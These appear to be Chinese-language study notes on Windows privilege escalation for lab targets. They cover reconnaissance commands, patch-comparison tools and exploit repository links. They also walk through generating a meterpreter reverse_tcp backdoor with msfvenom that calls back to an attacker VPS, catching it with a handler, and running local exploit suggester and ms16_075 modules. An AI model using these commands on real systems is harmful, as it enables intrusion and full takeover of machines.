windows提权分为
1、溢出漏洞
本地用户 当前计算机的某个用户,提权至最高权限
web权限 当前计算机的web权限,提权至本地用户或最高权限
2、数据库
3、第三方软件
-------------
提权的成功与否
1、符合的操作系统
2、符合的溢出漏洞
windows权限的说明
提权的步骤
1、信息收集
操作系统版本,位数,漏洞补丁,杀软,网络,当前权限等
ver systeminfo whaomi netsata -ano tasklist /svc
2、基于补丁和操作系统的位数来筛选可用的exp
可分为手工操作,cs半自动操作,msf全自动操作
3、上传exp去调用执行
常用的命令
小点
1、如果提权过程中无法执行命令的话可以上传cmd.exe上到可以执行的目录调用执行
2、如果ladon提权成功后可以使用提权后的漏洞再次执行cs上线文件再次上线即是提权后的权限
手工提权
三个检测项目
Vulmap-master项目
把ps1的powshell上传到靶机,然后直接直接使用powershell调用执行
WindowsVulnScan-master
上传ps1的文件,同样是使用powshell执行,如果powshell执行不了可以把systeminfo的内容按照格式替换到kb.json中,其实ps1的文件就是生成一个kb.json的文件;然后再使用py文件去对比
wesng-master项目
1.txt放入systeminfo的内容,然后使用脚本去进行比对,输出结果到vluns.scv
exp获取项目
直接寻找到对应的exp编号文件夹中下载.exe使用即可
https://github.com/Ascotbe/Kernelhub/tree/master/Windows
监控的发布的项目,可以再源码里面查看别人的项目地址,打开下载其中.exe
https://github.com/nomi-sec/PoC-in-GitHub
cs插件
https://github.com/k8gege/Ladon
msf提权
1、使用msf生成后门文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=vps地址 LPORT=3333 -f exe -o msf.exe 生成一个windows的pyload反弹走向的一个管道是tcp 地址就是vps的地址 生成了一个msf.exe的后门
2、再启一个vps界面,运行msf接受反弹的会话
msfconsole #启动msf use exploit/multi/handler #接受反弹会话 set pyload windows/meterpreter/reverse_tcp #设置对应的管道 set lport 3333 #设置监听端口 set lhost 0.0.0.0 #设置监听地址,设置成0.0.0.0代表监听所有,也可以设置成vps详细的地址 run
图例如下
3、再把生成的msf.exe 上传到靶机上,运行msf.exe 即可上线
4、收集信息
使用getuid来获取权限,发现是web权限
5、使用半自动方式提权
使用background切换出去,使用半自动的提权模块 post/windows/gather/enum_patches
使用命令set session设置session为1,就是使用该模块尝试刚才上线的那个会话
使用run即可开始比对,显示了可以尝试的漏洞编号
6、使用全自动的方式提权
使用命令 进行全自动的提权,使用msf的库去对漏洞补丁进行比对寻找。记得把参数showdescription 设置为true,匹配会更好一点
use post/mulit/recon/local_exploit_suggester set showdescription true set session 1 run
使用漏洞模块攻击这个会话1
use exploit/windows/local/ms16_075_reflection_juicy set session 1 run
执行全是+号返回没有创建会话
那就使用重新设置host为vps地址,端口是6666 然后执行
然后另外一边监听即可,这里应该是端口冲突了
图例命令汇总